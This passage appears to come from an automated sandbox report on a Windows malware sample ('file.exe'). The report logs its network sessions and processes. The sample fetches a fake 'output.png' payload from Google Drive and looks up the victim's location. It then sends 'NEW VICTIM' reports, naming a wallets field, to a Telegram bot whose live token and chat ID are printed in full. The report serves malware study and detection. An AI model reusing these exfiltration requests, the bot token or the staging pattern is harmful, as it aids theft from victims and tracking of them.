                                                                                                                                                                Dec 12, 2024 17:01:21.474416971 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.475886106 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.475955009 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.483351946 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.483418941 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.483496904 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.483553886 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.492038965 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.492100954 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.492130041 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.492182970 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.502837896 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.502926111 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.502948999 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.503020048 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.503031969 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.503082991 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.504122972 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.504182100 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.512053967 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.512254000 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.513453960 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.513536930 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.520833015 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.520894051 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.522285938 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.522344112 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.529861927 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.529932976 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.531234026 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.531286001 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.538794994 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.538858891 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.540003061 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.540055037 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.548248053 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.548305988 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.549546957 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.549599886 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.572715998 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.572793961 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.574023008 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.574080944 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.574115038 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.574161053 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.577440977 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.577508926 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.577626944 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.577692986 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.580513954 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.580569983 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.589107990 CET44349707172.217.17.65192.168.2.5
                                                                                                                                                                Dec 12, 2024 17:01:21.589196920 CET49707443192.168.2.5172.217.17.65
                                                                                                                                                                Dec 12, 2024 17:01:21.590281010 CET44349707172.217.17.65192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 17:01:10.767008066 CET | 62502 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 17:01:10.904217958 CET | 53 | 62502 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 17:01:13.593091011 CET | 49247 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 17:01:13.730916977 CET | 53 | 49247 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 17:01:19.406258106 CET | 61146 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 17:01:19.544481993 CET | 53 | 61146 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 17:01:21.301318884 CET | 51112 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 17:01:21.439353943 CET | 53 | 51112 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 12, 2024 17:01:10.767008066 CET | 192.168.2.5 | 1.1.1.1 | 0x28e | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:01:13.593091011 CET | 192.168.2.5 | 1.1.1.1 | 0xa25f | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:01:19.406258106 CET | 192.168.2.5 | 1.1.1.1 | 0xd015 | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:01:21.301318884 CET | 192.168.2.5 | 1.1.1.1 | 0x667e | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 17:01:10.904217958 CET | 1.1.1.1 | 192.168.2.5 | 0x28e | No error (0) | drive.google.com | | 216.58.208.238 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:01:13.730916977 CET | 1.1.1.1 | 192.168.2.5 | 0xa25f | No error (0) | drive.usercontent.google.com | | 172.217.17.65 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:01:19.544481993 CET | 1.1.1.1 | 192.168.2.5 | 0xd015 | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:01:21.439353943 CET | 1.1.1.1 | 192.168.2.5 | 0x667e | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                • drive.google.com
                                                                                                                                                                • drive.usercontent.google.com
                                                                                                                                                                • ipinfo.io
                                                                                                                                                                • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 216.58.208.238 | 443 | 6660 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 16:01:12 UTC | 150 | OUT | GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                User-Agent: FileDownloader
                                                                                                                                                                Host: drive.google.com
                                                                                                                                                                Cache-Control: no-cache
2024-12-12 16:01:13 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:13 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-LHPy8A6rrDjI9f7JUz1TUw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                1 | 192.168.2.5 | 49705 | 216.58.208.238 | 443 | 5576 | C:\Users\user\Desktop\file.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-12 16:01:13 UTC | 150 | OUT | GET /uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                User-Agent: FileDownloader
                                                                                                                                                                Host: drive.google.com
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                2024-12-12 16:01:14 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                Content-Type: application/binary
                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:13 GMT
                                                                                                                                                                Location: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-wqpGN7f4yD_1Gzu2ShXAUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                Server: ESF
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                2 | 192.168.2.5 | 49706 | 172.217.17.65 | 443 | 6660 | C:\Users\user\Desktop\file.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-12 16:01:15 UTC | 192 | OUT | GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                User-Agent: FileDownloader
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-12-12 16:01:18 UTC | 4919 | IN | HTTP/1.1 200 OK
                                                                                                                                                                X-GUploader-UploadID: AFiumC4xnZjtE4tdUWpVJ4W9D__y5_sJJdkOswfWnRHqLlPRk1Kjy7BSS-_ds35MVDFzWfyW3Nl7Dg0
                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                Content-Security-Policy: sandbox
                                                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 156917
                                                                                                                                                                Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:18 GMT
                                                                                                                                                                Expires: Thu, 12 Dec 2024 16:01:18 GMT
                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


                                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                3 | 192.168.2.5 | 49707 | 172.217.17.65 | 443 | 5576 | C:\Users\user\Desktop\file.exe
                                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                2024-12-12 16:01:15 UTC | 192 | OUT | GET /download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download HTTP/1.1
                                                                                                                                                                User-Agent: FileDownloader
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                2024-12-12 16:01:20 UTC | 4915 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                Content-Security-Policy: sandbox
                                                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                Content-Disposition: attachment; filename="output.png"
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Content-Length: 156917
                                                                                                                                                                Last-Modified: Mon, 11 Nov 2024 02:30:33 GMT
                                                                                                                                                                X-GUploader-UploadID: AFiumC4Mc6BXcsOUa6iaeSEjNuP0CESdeLPP5txQdaZk_2-AyVuScSMcs7B4sLGbmQrbwoDeYe0
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:20 GMT
                                                                                                                                                                Expires: Thu, 12 Dec 2024 16:01:20 GMT
                                                                                                                                                                Cache-Control: private, max-age=0
                                                                                                                                                                X-Goog-Hash: crc32c=h6mvlQ==
                                                                                                                                                                Server: UploadServer
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49710 | 34.117.59.81 | 443 | 6660 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 16:01:20 UTC | 91 | OUT | GET /json HTTP/1.1
                                                                                                                                                                User-Agent: IPInfoFetcher
                                                                                                                                                                Host: ipinfo.io
                                                                                                                                                                Cache-Control: no-cache
2024-12-12 16:01:21 UTC | 345 | IN | HTTP/1.1 200 OK
                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                Content-Length: 321
                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                date: Thu, 12 Dec 2024 16:01:21 GMT
                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                via: 1.1 google
                                                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
2024-12-12 16:01:21 UTC | 321 | IN | Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49712 | 149.154.167.220 | 443 | 6660 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 16:01:22 UTC | 513 | OUT | GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                User-Agent: TelegramBot
                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                Cache-Control: no-cache
2024-12-12 16:01:23 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:23 GMT
                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                Content-Length: 776
                                                                                                                                                                Connection: close
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-12 16:01:23 UTC | 776 | IN | Data Ascii: {"ok":true,"result":{"message_id":3331,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49719 | 34.117.59.81 | 443 | 5576 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 16:01:23 UTC | 91 | OUT | GET /json HTTP/1.1
                                                                                                                                                                User-Agent: IPInfoFetcher
                                                                                                                                                                Host: ipinfo.io
                                                                                                                                                                Cache-Control: no-cache
2024-12-12 16:01:23 UTC | 345 | IN | HTTP/1.1 200 OK
                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                Content-Length: 321
                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                date: Thu, 12 Dec 2024 16:01:23 GMT
                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                via: 1.1 google
                                                                                                                                                                strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                Connection: close
2024-12-12 16:01:23 UTC | 321 | IN | Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49720 | 149.154.167.220 | 443 | 5576 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 16:01:24 UTC | 513 | OUT | GET /bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=7427009775&text=%3Cb%3E%F0%9F%94%94NEW%20VICTIM%20%2D%20Extensions%20Installed%3C%2Fb%3E%0A%3Cb%3EIP%20Address%3A%3C%2Fb%3E%208%2E46%2E123%2E189%0A%3Cb%3EDevice%20Name%3A%3C%2Fb%3E%20648351%0A%3Cb%3ELocation%3A%3C%2Fb%3E%20New%20York%20City%2C%20New%20York%2C%20US%0A%3Cb%3EWallets%3A%3C%2Fb%3E%0A%3Ccode%3ENothing%20found%3C%2Fcode%3E&parse_mode=HTML HTTP/1.1
                                                                                                                                                                User-Agent: TelegramBot
                                                                                                                                                                Host: api.telegram.org
                                                                                                                                                                Cache-Control: no-cache
Timestamp:2024-12-12 16:01:25 UTC
Bytes transferred:388
Direction:IN
Data:
HTTP/1.1 200 OK
                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                Date: Thu, 12 Dec 2024 16:01:25 GMT
                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                Content-Length: 776
                                                                                                                                                                Connection: close
                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp:2024-12-12 16:01:25 UTC
Bytes transferred:776
Direction:IN
                                                                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":3332,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432",



                                                                                                                                                                Target ID:0
                                                                                                                                                                Start time:11:01:07
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                Imagebase:0x7ff72c9b0000
                                                                                                                                                                File size:605'696 bytes
                                                                                                                                                                MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:2
                                                                                                                                                                Start time:11:01:08
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                Imagebase:0x7ff72c9b0000
                                                                                                                                                                File size:605'696 bytes
                                                                                                                                                                MD5 hash:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:4
                                                                                                                                                                Start time:11:01:18
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                Imagebase:0x7ff67d6f0000
                                                                                                                                                                File size:251'392 bytes
                                                                                                                                                                MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:5
                                                                                                                                                                Start time:11:01:21
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                Imagebase:0x7ff67d6f0000
                                                                                                                                                                File size:251'392 bytes
                                                                                                                                                                MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:6
                                                                                                                                                                Start time:11:01:28
                                                                                                                                                                Start date:12/12/2024
                                                                                                                                                                Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                Imagebase:0x7ff67d6f0000
                                                                                                                                                                File size:251'392 bytes
                                                                                                                                                                MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                Target ID:7
                                                                                                                                                                Start time:11:01:36
